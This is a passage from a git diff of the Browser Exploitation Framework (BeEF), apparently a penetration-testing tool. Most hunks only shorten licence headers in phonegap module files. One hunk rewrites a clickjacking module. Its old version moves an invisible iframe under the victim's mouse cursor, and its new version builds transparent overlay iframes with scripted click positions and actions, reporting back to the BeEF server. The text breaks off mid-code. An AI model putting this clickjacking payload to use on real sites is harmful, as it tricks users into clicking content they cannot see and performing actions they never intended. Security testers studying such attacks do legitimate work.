Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // exploit phonegap // beef.execute(function() { diff --git a/modules/phonegap/phonegap_stop_record_audio/config.yaml b/modules/phonegap/phonegap_stop_record_audio/config.yaml index 5737fa722..2a78f4779 100644 --- a/modules/phonegap/phonegap_stop_record_audio/config.yaml +++ b/modules/phonegap/phonegap_stop_record_audio/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/phonegap/phonegap_stop_record_audio/module.rb b/modules/phonegap/phonegap_stop_record_audio/module.rb index f1022c7f2..974b18bdf 100644 --- a/modules/phonegap/phonegap_stop_record_audio/module.rb +++ b/modules/phonegap/phonegap_stop_record_audio/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # phonegap # diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js index 70985c019..522102be3 100644 --- a/modules/social_engineering/clickjacking/command.js +++ b/modules/social_engineering/clickjacking/command.js @@ -1,92 +1,139 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { - - var offset_top = "<%= @offset_top %>"; - var offset_left = "<%= @offset_left %>"; - var url = "<%= @url %>"; - var debug = <%= @debug %>; - - if (debug) opacity = 10; else opacity = 0; - - // create container - var cjcontainer = document.createElement('div'); - cjcontainer.id = "cjcontainer"; - cjcontainer.setAttribute("style", "-moz-opacity:"+opacity); - cjcontainer.style.zIndex = 999; - cjcontainer.style.border = "none"; - cjcontainer.style.width = "30px"; - cjcontainer.style.height = "20px"; - cjcontainer.style.overflow = "hidden"; - cjcontainer.style.position = "absolute"; - cjcontainer.style.opacity = opacity; - cjcontainer.style.filter = "alpha(opacity="+opacity+")"; - cjcontainer.style.cursor = "default"; - document.body.appendChild(cjcontainer); - - // create iframe - var cjiframe = document.createElement('iframe'); - cjiframe.id = "cjiframe"; - cjiframe.src = url; - cjiframe.scrolling = "no"; - cjiframe.frameBorder = "0"; - cjiframe.allowTransparency = "true"; - cjiframe.style.overflow = "hidden"; - cjiframe.style.position = "absolute"; - cjiframe.style.top = offset_top+"px"; - cjiframe.style.left = offset_left+"px"; - cjiframe.style.width = "200px"; - cjiframe.style.height = "100px"; - cjiframe.style.border = "none"; - cjiframe.style.cursor = "default"; - cjcontainer.appendChild(cjiframe); - - // followmouse code by rsnake - // http://ha.ckers.org/weird/followmouse.html - // modified by bcoles - function followmouse(e){ - - var xcoord = 0; - var ycoord = 0; - var gettrailobj = function() { - if (document.getElementById) - return document.getElementById("cjcontainer").style; - else if (document.all) - return document.all.container.style; - } - if (typeof e != "undefined") { - xcoord += e.pageX - 10; - ycoord += e.pageY - 15; - } else if (typeof window.event != "undefined") { - xcoord += document.body.scrollLeft + event.clientX; - ycoord += document.body.scrollTop + event.clientY; - } - var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15; - var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight) - gettrailobj().left = xcoord + "px"; - gettrailobj().top = ycoord + "px"; + var elems = { + outerFrame: "cjFrame", + innerFrame: "innerFrame", + btn: "persistentFocusBtn" } - // hook to mousemove event - if (window.addEventListener) { - window.addEventListener('mousemove', followmouse, false); - } else if (window.attachEvent) { - window.attachEvent('mousemove', followmouse); + var clicked = 0; + var src = "<%= @iFrameSrc %>"; + var secZone = "<%= @iFrameSecurityZone %>"; + var sandbox = "<%= @iFrameSandbox %>"; + var visibility = "<%= @iFrameVisibility %>"; + + var clicks = [ + {js:"<%= URI.escape(@clickaction_1) %>", posTop:cleanPos("<%= @iFrameTop_1 %>"), posLeft:cleanPos("<%= @iFrameLeft_1 %>")}, + {js:"<%= URI.escape(@clickaction_2) %>", posTop:cleanPos("<%= @iFrameTop_2 %>"), posLeft:cleanPos("<%= @iFrameLeft_2 %>")}, + {js:"<%= URI.escape(@clickaction_3) %>", posTop:cleanPos("<%= @iFrameTop_3 %>"), posLeft:cleanPos("<%= @iFrameLeft_3 %>")}, + {js:"<%= URI.escape(@clickaction_4) %>", posTop:cleanPos("<%= @iFrameTop_4 %>"), posLeft:cleanPos("<%= @iFrameLeft_4 %>")}, + {js:"<%= URI.escape(@clickaction_5) %>", posTop:cleanPos("<%= @iFrameTop_5 %>"), posLeft:cleanPos("<%= @iFrameLeft_5 %>")}, + {js:"<%= URI.escape(@clickaction_6) %>", posTop:cleanPos("<%= @iFrameTop_6 %>"), posLeft:cleanPos("<%= @iFrameLeft_6 %>")}, + {js:"<%= URI.escape(@clickaction_7) %>", posTop:cleanPos("<%= @iFrameTop_7 %>"), posLeft:cleanPos("<%= @iFrameLeft_7 %>")}, + {js:"<%= URI.escape(@clickaction_8) %>", posTop:cleanPos("<%= @iFrameTop_8 %>"), posLeft:cleanPos("<%= @iFrameLeft_8 %>")}, + {js:"void(0);", posTop:'-', posLeft:'-'} + ] + + var iframeAttrs = {}; + iframeAttrs.src = src; + (secZone == "on") ? iframeAttrs.security = "restricted" : ""; + (sandbox == "on") ? iframeAttrs.sandbox = "allow-forms" : ""; + + var iframeStyles = {}; + iframeStyles.width = "<%= @iFrameWidth %>px"; + iframeStyles.height = "<%= @iFrameHeight %>px"; + iframeStyles.opacity = (visibility == "on") ? "0.6" : "0.0"; + iframeStyles.filter = (visibility == "on") ? "alpha(opacity=60)" : "alpha(opacity=0)"; + + var innerPos = {}; + //initialize iframe + innerPos.top = clicks[0].posTop + "px"; + innerPos.left = clicks[0].posLeft + "px"; + + //returns a negative version of a number, or if NaN returns a dash + function cleanPos(coordinate) { + var iCoordinate = parseInt(coordinate); + if (isNaN(iCoordinate)) + return "-"; + else if (iCoordinate > 0) + return (-1 * iCoordinate) + return iCoordinate } - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event'); + function init(params, styles, stylesInner, callback) { + var container = $j.extend(true, {'border':'none', 'position':'absolute', 'z-index':'100000', 'overflow':'hidden'}, styles); + var inner = $j.extend(true, {'border':'none', 'position':'absolute', 'width':'2000px', 'height':'10000px'}, stylesInner); + var containerDiv = $j('
').css(container).prependTo('body'); + var containerDiv = $j('').appendTo('body'); + + var innerIframe = $j('